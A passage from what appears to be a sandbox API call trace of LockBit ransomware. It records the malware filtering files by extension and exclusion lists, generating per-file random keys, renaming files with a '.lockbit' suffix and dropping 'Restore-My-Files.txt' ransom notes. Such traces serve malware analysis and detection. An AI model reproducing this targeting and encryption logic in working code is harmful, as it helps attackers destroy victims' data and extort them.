(lpString1=".mod", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0184.524] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0184.524] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0184.524] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0184.524] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0184.524] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0184.524] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0184.525] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0184.525] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0184.525] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02039_.GIF") returned -1 [0184.525] lstrcmpiW (lpString1="ntldr", lpString2="WB02039_.GIF") returned -1 [0184.525] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02039_.GIF") returned -1 [0184.525] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02039_.GIF") returned -1 [0184.525] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02039_.GIF") returned -1 [0184.525] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02039_.GIF") returned -1 [0184.525] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02039_.GIF") returned -1 [0184.525] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0184.525] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF") returned=".GIF" [0184.525] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.525] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.525] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0184.525] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0184.525] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0184.525] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0184.525] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0184.526] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0184.526] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0184.526] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0184.526] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0184.526] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0184.526] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0184.526] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0184.526] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0184.526] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0184.526] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF.lockbit") returned 85 [0184.526] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02039_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0184.531] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0184.531] malloc (_Size=0x40068) returned 0x3df0008 [0184.531] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=908) returned 1 [0184.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0184.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.532] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0184.532] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0184.536] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.536] malloc (_Size=0xc0) returned 0x1fa2ed8 [0184.536] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0184.538] free (_Block=0x1fa2ed8) [0184.538] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0184.538] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0184.538] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0184.538] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x987, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02055_.GIF", cAlternateFileName="")) returned 1 [0184.538] lstrcmpiW (lpString1=".", lpString2="WB02055_.GIF") returned -1 [0184.538] lstrcmpiW (lpString1="..", lpString2="WB02055_.GIF") returned -1 [0184.538] PathFindExtensionW (pszPath="WB02055_.GIF") returned=".GIF" [0184.538] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0184.538] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0184.538] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0184.538] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0184.538] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0184.538] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0184.538] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0184.539] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0184.539] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0184.539] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0184.539] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0184.539] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0184.539] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0184.539] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0184.539] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0184.540] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0184.540] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0184.540] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02055_.GIF") returned -1 [0184.540] lstrcmpiW (lpString1="ntldr", lpString2="WB02055_.GIF") returned -1 [0184.540] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02055_.GIF") returned -1 [0184.540] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02055_.GIF") returned -1 [0184.540] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02055_.GIF") returned -1 [0184.540] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02055_.GIF") returned -1 [0184.540] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02055_.GIF") returned -1 [0184.540] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0184.541] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF") returned=".GIF" [0184.541] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.541] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.541] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0184.541] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0184.541] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0184.541] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0184.541] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0184.541] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0184.541] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0184.541] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0184.541] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0184.541] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0184.542] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0184.542] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0184.542] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0184.542] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0184.542] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF.lockbit") returned 85 [0184.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02055_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0184.546] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0184.546] malloc (_Size=0x40068) returned 0x1ff1e60 [0184.546] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2439) returned 1 [0184.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0184.547] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0184.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0184.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0184.547] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0184.549] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.549] malloc (_Size=0xc0) returned 0x1fa2ed8 [0184.549] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0184.550] free (_Block=0x1fa2ed8) [0184.550] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0184.550] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0184.550] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0184.551] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x37d, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB02073_.GIF", cAlternateFileName="")) returned 1 [0184.551] lstrcmpiW (lpString1=".", lpString2="WB02073_.GIF") returned -1 [0184.551] lstrcmpiW (lpString1="..", lpString2="WB02073_.GIF") returned -1 [0184.551] PathFindExtensionW (pszPath="WB02073_.GIF") returned=".GIF" [0184.551] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0184.551] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0184.551] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0184.551] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0184.551] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0184.551] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0184.551] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0184.551] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0184.551] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0184.551] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0184.551] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0184.551] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0184.551] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0184.551] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0184.551] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0184.551] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0184.551] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0184.551] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0184.551] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0184.551] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0184.551] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0184.552] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0184.552] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0184.552] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0184.552] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0184.552] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0184.552] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB02073_.GIF") returned -1 [0184.552] lstrcmpiW (lpString1="ntldr", lpString2="WB02073_.GIF") returned -1 [0184.553] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB02073_.GIF") returned -1 [0184.553] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB02073_.GIF") returned -1 [0184.553] lstrcmpiW (lpString1="autorun.inf", lpString2="WB02073_.GIF") returned -1 [0184.553] lstrcmpiW (lpString1="thumbs.db", lpString2="WB02073_.GIF") returned -1 [0184.553] lstrcmpiW (lpString1="iconcache.db", lpString2="WB02073_.GIF") returned -1 [0184.553] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0184.553] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF") returned=".GIF" [0184.553] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0184.553] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0184.553] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0184.553] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0184.553] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0184.553] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0184.553] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0184.553] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0184.554] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0184.554] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0184.554] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0184.554] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0184.554] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0184.554] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0184.554] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0184.554] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0184.554] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF.lockbit") returned 85 [0184.554] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02073_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02073_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0184.555] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0184.555] malloc (_Size=0x40068) returned 0x3d70450 [0184.555] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=893) returned 1 [0184.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 